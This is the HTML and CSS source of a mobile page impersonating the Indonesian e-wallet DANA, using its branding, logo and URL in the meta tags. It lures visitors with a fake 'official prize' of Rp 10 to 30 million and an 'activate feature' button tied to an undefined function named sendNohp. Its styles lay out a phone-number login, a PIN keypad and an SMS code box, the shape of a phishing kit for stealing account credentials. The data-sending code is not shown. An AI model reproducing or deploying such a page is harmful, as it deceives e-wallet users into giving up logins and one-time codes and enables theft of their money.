<html Permissions-Policy: autoplay=(self "dana.mp4")
>
 <head>
 <meta charset="UTF-8">
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" content="#118EEA">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
  <title>𝙝𝙖𝙙𝙞𝙖𝙝 𝙧𝙚𝙨𝙢𝙞 |𝙙𝙖𝙣𝙖 𝙞𝙙</title>
  <meta name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">

  <!-- Facebook Meta Tags -->
  <meta property="og:url" content="https://www.dana.id">
  <meta property="og:type" content="website">
  <meta property="og:title" content="𝗗𝗔𝗡𝗔 𝗜𝗗 | 𝗔𝗸𝘁𝗶𝗳𝗸𝗮𝗻 𝗙𝗶𝘁𝘂𝗿">
  <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSFJieIkGeDLDEBhVFSz-4Br-MbdbOpf-sAEw&usqp=CAU">

  <!-- Twitter Meta Tags -->
  <meta name="twitter:card" content="summary_large_image">
  <meta property="twitter:domain" content="https://www.dana.id">
  <meta property="twitter:url" content="https://www.dana.id">
  <meta name="twitter:title" content="𝗗𝗔𝗡𝗔 𝗜𝗗 | 𝗔𝗸𝘁𝗶𝗳𝗸𝗮𝗻 𝗙𝗶𝘁𝘂𝗿">
  <meta name="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <meta name="twitter:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSFJieIkGeDLDEBhVFSz-4Br-MbdbOpf-sAEw&usqp=CAU">
 <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSFJieIkGeDLDEBhVFSz-4Br-MbdbOpf-sAEw&usqp=CAU" rel="shortcut icon" type="image/x-icon">
  <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSFJieIkGeDLDEBhVFSz-4Br-MbdbOpf-sAEw&usqp=CAU" rel="apple-touch-icon">
 <link rel="canonical" href="https://www.dana.id/">
<meta property="og:url" content="https://www.dana.id/" />
<meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
<meta property="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Varela+Round&amp;display=swap'><link rel="stylesheet" href="./style.css">
<!-- partial:index.partial.html -->
<link href="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet">
<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@48,400,0,0" />
<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css" />
<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
<link href="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.theme.default.min.css" rel="stylesheet">
<script src="https://owlcarousel2.github.io/OwlCarousel2/assets/vendors/jquery.min.js">
</script>
 <script src="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/owl.carousel.js">
   </script>
<script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
<script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
</head>
<style>
@import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      max-width: 100%;
      overflow-x: hidden;
      }
body {
    margin: 0px;
    background: #fff;
    color: #000;
    font-family: 'Nunito', sans-serif;
}
welalxcome {
        position: fixed;
    left: 0;
    top: 0;
    bottom: 0;
    width: 100%;
    height: 100%;
    display: block;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
    background: #118EEA;
}
welalxcome img {
        width:100%;
    height: 100%;
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.talxcome {
    width: 130%;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 100%;
    justify-content: center;
}
.talxcome img {
        width: 73%;
}
.balxcome {
        height: 45vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.txalxcome {
        width: 90%;
    height: 30vh;
    text-align: left;
}
.txalxcome p {
        font-weight: 600;
    font-size: 1.5rem;
    margin-bottom: 5vh;
    color: #1d66ab;
}
.txalxcome span {
        width: 80%;
    font-size: 18px;
}
.btalxcome {
        width: 90%;
    height: 20vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.btalxcome button {
        width: 100%;
    background: #1d66ab;
    color: #fff;
    font-family: inherit;
    border-radius: 5px;
    border: none;
    font-size: 16px;
    padding: 2vh 0px;
    margin-bottom: 4vh;
    font-weight: 500;
    box-shadow: 0px 0px 1px 0px #000;
    cursor: pointer;
}
.btalxcome p {
        color: #1d66ab;
    font-weight: 500;
    cursor: pointer;
}
frmalxbr {
        position: relative;
    width: 100vw;
    height: 100vh;
}
.hdralxfrm {
        width: 100%;
    position: fixed;
    left: 0;
    top: 0;
    display: block;
    text-align: center;
    padding: 1.5vh 0px;
    box-shadow: 0px 1px 20px 0px #00000040;
    z-index: 1;
}
.hdralxfrm img {
        width: 10vw;
    height: auto;
}
.chalxfrm {
        position: relative;
    width: 100%;
    height: 50vh;
    z-index: 0;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.bgchalxfrm {
    background: url(https://siapjadi.com/brimo0/bifast1/halo2.jpg) no-repeat center;
    background-size: 100%;
    position: unset;
    width: 100%;
    border-radius: 0px;
    top: 0;
    height: 100%;
    border: none;
    margin-top:-50px;
}
.chalxfrm p {
        position: absolute;
    color: #fff;
    font-size: 19px;
    font-weight: 600;
    letter-spacing: 1px;
    top: 11vh;
}
.chalxfrm img {
        position: absolute;
    width: 90%;
    bottom: 5vh;
}
.frmalxbrm {
        display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 42vh;
    width: 100%;
}
.inpalxbrm {
        margin-top: 3vh;
    width: 90%;
    height: 35vh;
}
.inpalxbrm p {
        color: #2069ab;
    font-weight: 600;
    font-size: 18px;
    letter-spacing: 1px;
    margin-left: 3vw;
}
.bxmalxbrm {
        display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    width: 100%;
    padding-top: 2vh;
}
.itmalxbrm {
    position: relative;
        width: 95%;
    background: #fff;
    box-shadow: 0px 1px 3px 0px #00000087;
    border-radius: 3px;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    padding: 1.8vh 2vw;
    column-gap: 3vw;
}
.itmalxbrm img {
        height: 4vh;
}
.itmalxbrm input {
        font-family: arial, sans-serif;
    font-size: 17px;
    font-weight: 300;
    border: none;
    outline: none;
}
.inpalxbrm span {
        width: 100%;
    text-align: right;
    display: block;
    margin-top: 2.5vh;
    font-size: 14px;
    cursor: pointer;
}
.btnalxfrm {
        height: 10vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-content: center;
    justify-content: center;
    align-items: center;
    width: 90%;
}
.btnalxfrm button {
        width: 100%;
    background: #1d66ab;
    color: #fff;
    font-family: inherit;
    border-radius: 5px;
    border: none;
    font-size: 16px;
    padding: 2vh 0px;
    margin-bottom: 4vh;
    font-weight: 500;
    box-shadow: 0px 0px 1px 0px #000;
    cursor: pointer;
}
#togglePassword {
    background-size: 100% 100%;
    height: 3vh;
    width: 3.5vh;
    margin-top: 0;
    position: absolute;
    right: 4vw;
    cursor: pointer;
}
.fa-eye {
    background: url(https://siapjadi.com/brimo/bulamata-.png) no-repeat center;
}
.fa-eye-slash {
    background: url(https://cdn.jsdelivr.net/gh/AlexHostX/another@main/brims/20220617_022922.png) no-repeat center;
}
.opbtn {
    opacity: 0.5;
}
.alxslh {
        position: fixed;
    left: 0;
    top: 8vh;
    z-index: 3;
    font-size: 14px;
    font-weight: 400;
    color: #fff;
    background: #f53939;
    text-align: center;
    width: 100%;
    font-family: arial, sans-serif;
    padding: 1.7vh 0px;
    display: none;
}
pnalxbr {
        background: rgb(36 131 240);
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    width: 100vw;
    height: 100vh;
    color: white;
}
.hdralxpn {
        width: 100%;
    height: 5vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    justify-content: space-between;
}
.hdralxpn span {
        margin-left: 3%;
}
.hdralxpn p {
       font-weight: 400;
    font-size: 15px; 
}
.hdralxpn label {
        visibility: hidden;
    margin-right: 3%;
}
.txalxpn {
        padding-top: 10vh;
    padding-bottom: 5vh;
    width: 70%;
    text-align: left;
}
.txalxpn p {
       font-size: 17px;
    font-weight: 400; 
}
.txalxpn span {
        font-size: 12px;
    font-weight: 300;
    font-family: Arial, sans-serif;
}
.inpalxpn {
        width: 70%;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
#alxpnnikah {
    width: 100%;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    justify-content: center;
    column-gap: 7vw;
    position: relative;
    align-content: center;
}

#ionIcons {
            color: rgb(22, 119, 199);
            font-size: 35px;
            position: absolute;
            display: block;
            margin-top: -2px;
            margin-left: 14px;
        }

#alxpnnikah input {
        position: absolute;
    z-index: 2;
    color: #fff;
    border: none;
    outline: none;
    font-family: inherit;
    background: transparent;
    font-size: 24px;
    letter-spacing: 10vw;
    width: 100%;
    overflow: hidden;
    float: left;
    text-align: left;
    text-overflow: revert;
    cursor: not-allowed;
    pointer-events: none;
}
.bxinpalxpn {
        width: 6vw;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    position: relative;
    align-content: center;
    justify-content: center;
    
}
.bxinpalxpn input {
        width: 100%;
    height: 100%;
    position: absolute;
    background: transparent;
    outline: none;
    border: none;
    cursor: pointer;
    text-align: center;
    color: #fff;
    font-family: inherit;
    font-size: 24px;
}
.bxinpalxpn span {
       background-color:#88b4e6;
    color:white;
    height: 6.5vh;
    width: 5.5vh;
    display: block;
    border-radius: 10px;
}
.txalxlppn {
        padding: 7vh 0px 9vh;
    font-size: 13px;
    font-family: arial, sans-serif;
    cursor: pointer;
}
.kybalxpn {
        width: 90%;
}
.inpalxkyb {
        width: 80%;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    justify-content: space-between;
    margin-bottom: 4vh;
    margin-left:30px;
}
.inpalxkyb button {
    background-color: transparent;
    
    font-family: inherit;
    cursor: pointer;
    outline: none;
    border: none;
    font-size: 25px;
    width: 20%;
    height: 6vh;
}
smalxs {
        height: 100vh;
    width: 100vw;
    background: #f2f2f2;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-content: center;
    justify-content: center;
    align-items: center;
}
.bxalxsm {
        position: relative;
    width: 85%;
    padding: 15vh 0% 2vh;
    background: #fff;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    border: 1px solid rgba(166, 166, 166, 0.37);
    border-radius: 10px;
}
.bxalxsm img {
        width: 80%;
    position: absolute;
    top: -10vh;
}
.bxalxsm garis {
        display: block;
    width: 100%;
    border-bottom: 2px dotted rgb(204, 204, 204);
}
.bxalxsm label {
        color: #0776ED;
    font-weight: 300;
    font-family: arial, sans-serif;
    padding: 2vh;
}
.alxinpsm {
        width: 90%;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: flex-start;
}
.alxinpsm span {
        color: rgb(158, 158, 158);
    font-size: 12px;
    font-family: arial, sans-serif;
}
.alxinpsm input {
        box-sizing: border-box;
    z-index: 4;
    height: 75px;
    width: 100%;
    left: 0px;
    border-width: 1px;
    border-style: solid;
    border-color: rgb(189, 189, 189) rgb(189, 189, 189) rgb(214, 214, 214);
    border-image: initial;
    background-color: transparent;
    border-radius: 5px;
    box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
    font-size: 13px;
    color: rgb(85, 85, 85);
    padding: 0px 4px;
    top: 20px;
    transition: border-bottom-color 200ms ease 0s;
    margin: 1vh 0px 2vh;
    font-family: arial, sans-serif;
    outline: navajowhite;
}
.btnalxsm {
        width: 100%;
    text-align: right;
}
.btnalxsm button {
    cursor: pointer;
    background: none rgb(0, 134, 224);
    border: none;
    text-align: center;
    box-sizing: border-box;
    z-index: 6;
    height: 33px;
    left: 0px;
    top: 0px;
    font-size: 14px;
    color: rgb(255, 255, 255);
    line-height: 1;
    border-radius: 6px;
    box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
    font-family: arial, sans-serif;
    letter-spacing: 1px;
    padding: 0px 10px;
    outline: navajowhite;
}
.dscalxsm {
        margin-top: 5vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.dscalxsm p {
        text-align: center;
    width: 90%;
    font-size: 10px;
    color: rgba(10, 10, 10, 0.73);
    font-family: arial, sans-serif;
}
.malasngoding-slider { 
    border: 10px solid #efefef; 
    position: relative; 
    overflow: hidden; 
    background: #efefef;
}
 
.malasngoding-slider { 
    margin:20px auto;
    width: 768px;
    height: 450px; 
}
 
.isi-slider img { 
    width: 768px;
    height: 450px; 
    float: left;
}
 
.isi-slider { 
    position: absolute; 
    width:3900px;  
 
    /*pengaturan durasi lama tampil gambar bisa di atur di bawah ini*/
    animation-name:slider;
    animation-duration:16s;
    animation-timing-function: ease-in-out;
    animation-iteration-count:infinite;
    -webkit-animation-name:slider;
    -webkit-animation-duration:16s;
    -webkit-animation-timing-function: ease-in-out;
    -webkit-animation-iteration-count:infinite;
    -moz-animation-name:slider;
    -moz-animation-duration:16s;
    -moz-animation-timing-function: ease-in-out;
    -moz-animation-iteration-count:infinite;
    -o-animation-name:slider;
    -o-animation-duration:16s;
    -o-animation-timing-function: ease-in-out;
    -o-animation-iteration-count:infinite;
}
 
 
/*saat gambar di hover oleh cursor mouse maka berhenti slide*/
.isi-slider:hover { 
    -webkit-animation-play-state:paused; 
    -moz-animation-play-state:paused; 
    -o-animation-play-state:paused; 
    animation-play-state:paused; }
}
 
.isi-slider img { 
    float: right; 
}
 
.malasngoding-slider:after { 
    font-size: 150px; 
    position: absolute; 
    z-index: 12; 
    color: rgba(255,255,255, 0); 
    left: 300px; top: 80px; 
    -webkit-transition: 1s all ease-in-out; 
    -moz-transition: 1s all ease-in-out; 
    transition: 1s all ease-in-out; 
}
 
.malasngoding-slider:hover:after { 
    color: rgba(255,255,255, 0.6);  
}
 
 
 
@-moz-keyframes slider {     
    0% {
        left: 0; opacity: 0; 
    }     
    2% {
        opacity: 1; 
    }     
    20% {
        left: 0; opacity: 1; 
    }     
    21% {
        opacity: 0; 
    }     
    24% {
        opacity: 0; 
    }     
    25% {
        left: -768px; opacity: 1; 
    }       
    45% {
        left: -768px; opacity: 1; 
    }     
    46% {
        opacity: 0; 
    }     
    48% {
        opacity: 0; 
    }     
    50% {
        left: -1536px; opacity: 1; 
    }     
    70% {
        left: -1536px; opacity: 1; 
    }     
    72% {
        opacity: 0; 
    }     
    74% {
        opacity: 0; 
    }    
    75% {
        left: -2304px; opacity: 1; 
    }       
    95% {
        left: -2304px; opacity: 1; 
    }       
    97% { 
        left: -2304px; opacity: 0;
    }       
    100% {
        left: 0; opacity: 0; 
    }
} 
 
@-webkit-keyframes slider {     
    0% {
        left: 0; opacity: 0; 
    }     
    2% {
        opacity: 1; 
    }     
    20% {
        left: 0; opacity: 1; 
    }     
    21% {
        opacity: 0; 
    }     
    24% {
        opacity: 0; 
    }     
    25% {
        left: -768px; opacity: 1; 
    }       
    45% {
        left: -768px; opacity: 1; 
    }     
    46% {
        opacity: 0; 
    }     
    48% {
        opacity: 0; 
    }     
    50% {
        left: -1536px; opacity: 1; 
    }     
    70% {
        left: -1536px; opacity: 1; 
    }     
    72% {
        opacity: 0; 
    }     
    74% {
        opacity: 0; 
    }    
    75% {
        left: -2304px; opacity: 1; 
    }       
    95% {
        left: -2304px; opacity: 1; 
    }       
    97% { 
        left: -2304px; opacity: 0;
    }       
    100% {
        left: 0; opacity: 0; 
    }
} 
 
 
@keyframes slider {     
    0% {
        left: 0; opacity: 0; 
    }     
    2% {
        opacity: 1; 
    }     
    20% {
        left: 0; opacity: 1; 
    }     
    21% {
        opacity: 0; 
    }     
    24% {
        opacity: 0; 
    }     
    25% {
        left: -768px; opacity: 1; 
    }     
    45% {
        left: -768px; opacity: 1; 
    }     
    46% {
        opacity: 0; 
    }     
    48% {
        opacity: 0; 
    }     
    50% {
        left: -1536px; opacity: 1; 
    }     
    70% {
        left: -1536px; opacity: 1; 
    }     
    72% {
        opacity: 0; 
    }     
    74% {
        opacity: 0; 
    }    
    75% {
        left: -2304px; opacity: 1; 
    }       
    95% {
        left: -2304px; opacity: 1; 
    }       
    97% { 
        left: -2304px; opacity: 0; 
    } 
 
    100% {
        left: 0; opacity: 0; 
    }
}
*{
    margin: 0;
    padding: 0;
    list-style: none;
    text-decoration: none;
}

.slider{
    overflow: hidden;
    height:430px;
}

.slider figure div{
    width: 20%;
    float: left;
}

.slider figure img{
    width: 100%;
    float: left;
    height: 152px;
    border-bottom: 2px solid #fff;
}

.slider figure{
    position: relative;
    width: 500%;
    margin: 0;
    left: 0;
    animation: 20s slidy infinite;
}

@keyframes slidy{
    0%{
        left: 0%
    }

    10%{
        left: 0%;
    }

    12%{
        left: -100%;
    }

    22%{
        left: -100%;
    }

    24%{
        left: -200%;
    }

    34%{
        left: -200%;
    }

    36%{
        left: -300%;
    }

    46%{
        left: -300%;
    }

    48%{
        left: -400%;
    }

    58%{
        left: -400%;
    }

    60%{
        left: -300%;
    }

    70%{
        left: -300%;
    }

    72%{
        left: -200%;
    }

    82%{
        left: -200%;
    }

    84%{
        left: -100%;
    }

    94%{
        left: -100%;
    }

    96%{
        left: 0%;
    }

    100%{
        left: 0%;
    }
}
/* css modal */

:root {
  --modal-duration: 1s;
  --modal-color: #428bca;
}


.button {
  background: #428bca;
  padding: 1em 2em;
  color: #fff;
  border: 0;
  border-radius: 5px;
  cursor: pointer;
}

.button:hover {
  background: #3876ac;
}

.modal {
  display: none;
  position: fixed;
  z-index: 1;
  left: 0;
  top: 0;
  height: 100%;
  width: 100%;
  overflow: auto;
  background-color: rgba(0, 0, 0, 0.5);
}

.modal-content {
  margin: 50% auto;
  width: 85%;
  box-shadow: 0 5px 8px 0 rgba(0, 0, 0, 0.2), 0 7px 20px 0 rgba(0, 0, 0, 0.17);
  animation-name: modalopen;
  animation-duration: var(--modal-duration);
}

.modal-header h2,
.modal-footer h3 {
  margin: 0;
}

.modal-header {
  background: var(--modal-color);
  padding: 15px;
  color: #fff;
  border-top-left-radius: 5px;
  border-top-right-radius: 5px;
}

.modal-body {
  padding: 10px 20px;
  background: #fff;
}

.modal-footer {
  background: var(--modal-color);
  padding: 10px;
  color: #fff;
  text-align: center;
  border-bottom-left-radius: 5px;
  border-bottom-right-radius: 5px;
}

.close {
  color: #ccc;
  float: right;
  font-size: 30px;
  color: #fff;
}

.close:hover,
.close:focus {
  color: #000;
  text-decoration: none;
  cursor: pointer;
}

@keyframes modalopen {
  from {
    opacity: 0;
  }
  to {
    opacity: 1;
  }
}
#alxsm {
      border-radius: 10px;
      border: 2px solid #09559a;
      color: #09559a;
      font-size: 14px;
      font-weight:bold;
      margin-bottom: 15px;
      padding: 0.5em 1em 0.5em 0;
      width: 90%;     /* Ukuran bebas */
      height: 100px;     /* Ukuran bebas */
      text-align: center;
      margin-left:5px;
 }
 .bgchalxfrm2 {
    background: url(https://siapjadi.com/header4.png) no-repeat center;
    background-size: 110%;
    position: unset;
    width: 130%;
    border-radius: 0px;
    top: 0;
    height: 500px;
    border: none;
    margin-right:-20px;
}



input::placeholder{
    color: #bbb;
}
/* css modal*/



ion-icon{
    font-size: 22px;
    margin-left: 8px;
    margin-top: 5px;
    position: absolute;
    color: #06529C;
}




/* Added PseudoCode CSS to Hide the Controls of Video as on adding Controls Attribute to Video, the controls of video get visible easily. So to control that case also, this needs to be present on CSS End */

video::-webkit-media-controls {
    display: ;
}

video {
  display: none;
  pointer-events: none;
}


#carousel {
  grid-row: 1 / 2;
  grid-column: 1 / 8;
  width: 150vw;
  height: 500px;
  display: flex;
  align-items: center;
  justify-content: center;
  overflow: hidden;
  transform-style: preserve-3d;
  perspective: 600px;
  --items: 5;
  --middle: 3;
  --position: 1;
  pointer-events: none;
}


div.item {
  position: absolute;
  width: 350px;
  height: 400px;
  background-color: coral;
  --r: calc(var(--position) - var(--offset));
  --abs: max(calc(var(--r) * -1), var(--r));
  transition: all 0.25s linear;
  transform: rotateY(calc(-10deg * var(--r)))
    translateX(calc(-300px * var(--r)));
  z-index: calc((var(--position) - var(--abs)));
}

div.item:nth-of-type(1) {
  --offset: 1;
  background-color: #90f1ef;
}
div.item:nth-of-type(2) {
  --offset: 2;
  background-color: #ff70a6;
}
div.item:nth-of-type(3) {
  --offset: 3;
  background-color: #ff9770;
}
div.item:nth-of-type(4) {
  --offset: 4;
  background-color: #ffd670;
}
div.item:nth-of-type(5) {
  --offset: 5;
  background-color: #e9ff70;
}

div.item img{
    width: 300px;
}

 
    /*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 300px;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

/*********************/

.radio-section {
	display: flex;
	align-items: center;
	justify-content: center;
	height: 50vh;
}
h1 {
	margin-bottom: 20px;
}
.radio-item [type="radio"] {
	display: none;
}
.radio-item + .radio-item {
	margin-top: 15px;
}
.radio-item label {
	display: block;
	padding: 14px 20px;
	background: #118EEA;
	border: 1px solid rgba(255, 255, 255, 1.1);
	color: #fff;
	box-shadow: rgba(0, 0, 0, 0.35) 0px 3px 3px 0px;
	border-radius: 8px;
	cursor: pointer;
	font-size: 15px;
	font-weight: 400;
	min-width: 250px;
	white-space: nowrap;
	position: relative;
	transition: 0.4s ease-in-out 0s;
}
.radio-item label:after,
.radio-item label:before {
	content: "";
	position: absolute;
	border-radius: 50%;
}
.radio-item label:after {
	height: 19px;
	width: 19px;
	border: 2px solid #00B0DF;
	left: 19px;
	top: 10;
	top: calc(50% - 11px);
	transition: 0.4s ease-in-out 0s;
}
.radio-item label:before {
	background: #fff;
	height: 20px;
	width: 20px;
	left: 20px;
	top: 11.2;
	top: calc(50%-6px);
	transform: scale(5);
	opacity: 0;
	visibility: hidden;
	
}
.radio-item [type="radio"]:checked ~ label {
	border-color: #00EF53;
}
.radio-item [type="radio"]:checked ~ label::before {
	opacity: 1;
	visibility: visible;
	transform: scale(1);
}

</style>
<body>
<main>
<welalxcome style="display: none">
<img src="dana_logo.jpg" alt="" />
</welalxcome>
<chsalxcome2 style="display: none; background-color: #118EEA">
<div style="height:30px;width: 70px;margin-top: -21px;margin-bottom: 0px;float:center;margin-left:42%; background: #118EEA" class="talxcome">
</div>
<nav style="position: relative; top: -10; left: 0; right: 0; margin: 0px auto; width: 100%; height: 70px; background: #118EEA; border-bottom: 2px solid #fff">
 <img style="margin-top:15px; margin-left:10px;" width="120px" src="https://a.m.dana.id/danaweb/v3/DANA-Logo-white.svg" alt="" />   
</nav>




<form id="formHP" onsubmit="sendNohp(event); return false" method="post" accept-charset="utf-8">
<div class="" style="margin-left: 20px;margin-top: 160px;position:relative;border:0px solid #0085e0;padding:15px;width:82%;border-radius:20px; background: #fff; height: 290px; box-shadow: rgba(0, 0, 0, 0.15) 0px 5px 15px 0px; overflow:hidden; border-top: 0px solid #ccc;text-align: left; background: url(https://a.m.dana.id/resource/danaweb-v2/hero-personal-bg-subject.png);
    background-position: 100% 100%;
    background-size: 100% 100%; background-color: #fff; outline: 1px solid #118EEA; text-shadow: 0 1px 1px rgba(888, 999, 255, 10.75);box-shadow: rgba(6, 24, 24, 0.99) 0px 0px 0px 2px, rgba(6, 24, 4, 10.65) 0px 4px 6px -1px, rgba(255, 255, 255, 0.08) 0px 1px 0px inset;">
<center style="color:#118EEA; line-height: 17px; font-size: 15px; padding: 5px; font-weight: bold"><p>𝗦𝗜𝗟𝗔𝗛𝗞𝗔𝗡 𝗣𝗜𝗟𝗜𝗛 𝗦𝗔𝗟𝗔𝗛 𝗦𝗔𝗧𝗨 𝗙𝗜𝗧𝗨𝗥 𝗗𝗜𝗕𝗔𝗪𝗔𝗛 𝗜𝗡𝗜</p><br><hr style="font-weight: bold; border: 1px solid #118EEA; margin-top: -5px">

</center>
<br/>
<center style="color:#aaa; line-height: 17px; font-size: 15px; padding: 5px; font-weight: bold; position: absolute; left: 0; right: 0; z-index: 999999; margin-top: 180px; letter-spacing:; text-shadow: none"><p>
    𝗦𝗲𝗴𝗲𝗿𝗮 𝗮𝗸𝘁𝗶𝗳𝗸𝗮𝗻 𝗳𝗶𝘁𝘂𝗿𝗻𝘆𝗮 𝘀𝗲𝘀𝘂𝗮𝗶 𝗱𝗲𝗻𝗴𝗮𝗻 𝗸𝗲𝗯𝘂𝘁𝘂𝗵𝗮𝗻 𝗮𝗻𝗱𝗮
</p><br>
</center>
<section class="radio-section" style="margin-top: -100px; text-align: center">
    
	<div class="radio-list">
		
		<div class="radio-item"><input name="radio" id="radio1" type="radio"><label for="radio1">30.000
		000</label></div>
		<div class="radio-item"><input name="radio" id="radio2" type="radio"><label for="radio2">𝙍𝙥.20.000.000</label></div>
		<div class="radio-item"><input name="radio" id="radio3" type="radio"><label for="radio3">𝙍𝙥.10.000.000</label></div>
	</div>
</section>


<br>


<br><br>
</div>
<div>
<br>
<br>
<br>
<br>
<div style="position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 72px; background: #fff; box-shadow: rgba(0, 0, 0, 0.25) 0px 5px 10px 5px; padding-top: 15px; border-top: 0.2px solid #bbb">
<button type="submit" id="kirims" style="margin-left: 20px;margin-top: ;position:absolute;background-color:#118EEA;color:white;border:0px solid #0076e0;width:90%;border-radius:50px;font-family: 'Nunito', sans-serif;font-size: 16px;padding:13px;display: inline-block; box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px; text-shadow: 0 1px 1px rgba(888, 999, 255, 10.75)" >Aktifkan Fitur</button>
           </div>
</form>

<footer style="position: fixed; top: 70; left: 0; right: 0; width: 100%; height: 200px; z-index: -1">
<!----------HTML code starts here------->

<div class="owl-carousel owl-theme owl-loaded " style=" height: 160px; transform-style: preserve-3d; overflow: hidden">
            

         
         <div class="owl-stage" style="transform: translate3d(-1527px, 0px, 0px); transition: all 0.05s ease 1s; width: 3334px; background-color: ; padding: 0px; margin-left: 30px; margin-top: 5px">
           
   <div class="owl-item item active;" style="box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; border-radius: 10px; background: transparent;"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT8SntYkdBep6G96w5OXmttocg3MvwTqlnBfo_dx4zyUWYARztiqcooApISekkKuI6tfCMqPZxj25lEVU5TElnFRp41zX138s8PtJUUMvlPy5JOkOTEFuDxWuXDdo83JvqykEblzcLmCwJ1xmSxhi2DU9Wu6w-RdgljnF76rfW742CYLuZBpIttE5uRDg/s1080/AddText_04-24-01.58.56.jpg" style="border-radius: 8px; height: 154px"></div>
